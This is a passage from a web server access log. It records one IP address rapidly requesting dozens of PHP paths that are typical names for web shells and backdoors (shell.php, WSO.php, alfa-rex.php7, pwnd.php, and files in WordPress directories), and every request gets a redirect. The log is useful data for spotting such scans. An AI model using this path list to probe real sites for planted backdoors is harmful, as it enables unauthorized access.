rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:04 -0500] "GET /atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:03 -0500] "GET /cloud.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:03 -0500] "GET /akc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:04 -0500] "GET /about/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:05 -0500] "GET /k.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:05 -0500] "GET /moon.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:06 -0500] "GET /.well-known/pki-validation/cux.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:06 -0500] "GET /nc4.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:06 -0500] "GET /wp-content/dn.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:07 -0500] "GET /radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:07 -0500] "GET /wp-includes/Requests/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:07 -0500] "GET /cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:08 -0500] "GET /makeasmtp.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:08 -0500] "GET /filemanager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:09 -0500] "GET /wp-content/plugins/phpad/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:09 -0500] "GET /404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:09 -0500] "GET /akp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.192.110 - - [20/Dec/2025:14:51:09 -0500] "GET /themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:09 -0500] "GET /default.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:10 -0500] "GET /10.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:10 -0500] "GET /new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:04 -0500] "GET /flower.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:04 -0500] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:04 -0500] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:05 -0500] "GET /lock360.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:05 -0500] "GET /admin/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:06 -0500] "GET /shell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:06 -0500] "GET /x.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:07 -0500] "GET /install.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:07 -0500] "GET /wp-content/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:08 -0500] "GET /classsmtps.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:08 -0500] "GET /2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:08 -0500] "GET /insoamv.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:10 -0500] "GET /doc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:10 -0500] "GET /wp-content/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:11 -0500] "GET /hehehehe.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:11 -0500] "GET /403.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:12 -0500] "GET /class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:12 -0500] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:13 -0500] "GET /.bod/.ll/ss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:13 -0500] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:10 -0500] "GET /as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:11 -0500] "GET /xmrlpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:11 -0500] "GET /randkeyword.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:11 -0500] "GET /file5.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:12 -0500] "GET /makeasmtp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:12 -0500] "GET /sck.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:12 -0500] "GET /WSO.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:14 -0500] "GET /alfa-rex.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:14 -0500] "GET /css.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:14 -0500] "GET /log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:15 -0500] "GET /xmlrpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:15 -0500] "GET /wp-content/themes/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:15 -0500] "GET /.well-known/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:16 -0500] "GET /wp-admin/network/insoamv.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:16 -0500] "GET /akc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:16 -0500] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:17 -0500] "GET /wp-includes/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:17 -0500] "GET /images/class-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:17 -0500] "GET /wp-trackback.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:17 -0500] "GET /wp-admin/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:18 -0500] "GET /wp-signup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:51:18 -0500] "GET /wp-admin/js/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:18 -0500] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:18 -0500] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:19 -0500] "GET /a.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:19 -0500] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:19 -0500] "GET /xx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:20 -0500] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:20 -0500] "GET /past.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:20 -0500] "GET /z.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:21 -0500] "GET /gel4y.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:21 -0500] "GET /wp-Grt3xj.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:22 -0500] "GET /content.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:22 -0500] "GET /wp-admin/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:22 -0500] "GET /wp-content/plugins/shell/ff2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:22 -0500] "GET /wp-content/1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:22 -0500] "GET /wp-content/classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:23 -0500] "GET /function/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:23 -0500] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:23 -0500] "GET /wp-content/file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:13 -0500] "GET /woh.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:13 -0500] "GET /wp-mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:13 -0500] "GET /system_log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:14 -0500] "GET /about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:14 -0500] "GET /asasx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:15 -0500] "GET /wp-content/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:15 -0500] "GET /ff2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:16 -0500] "GET /dropdown.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:16 -0500] "GET /function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:18 -0500] "GET /wp-admin/maint/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:19 -0500] "GET /wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:19 -0500] "GET /w.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:20 -0500] "GET /shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:20 -0500] "GET /wp-2019.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:21 -0500] "GET /asasx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:21 -0500] "GET /wp-content/shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:21 -0500] "GET /gold.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:23 -0500] "GET /elp.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:23 -0500] "GET /jp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:24 -0500] "GET /f35.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:24 -0500] "GET /wp-includes/wp-atom.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:24 -0500] "GET /wp-admin/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:25 -0500] "GET /db5.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:25 -0500] "GET /wp-admin/images/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:26 -0500] "GET /zwso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:26 -0500] "GET /text.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:26 -0500] "GET /aaa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:26 -0500] "GET /classwithtostring.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:26 -0500] "GET /wp-includes/Text/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:27 -0500] "GET /test1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:28 -0500] "GET /wp-content/plugins/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:28 -0500] "GET /wp-content/plugins/pwnd/1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:28 -0500] "GET /wp-admin/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:28 -0500] "GET /lock.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:29 -0500] "GET /wp-content/themes/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 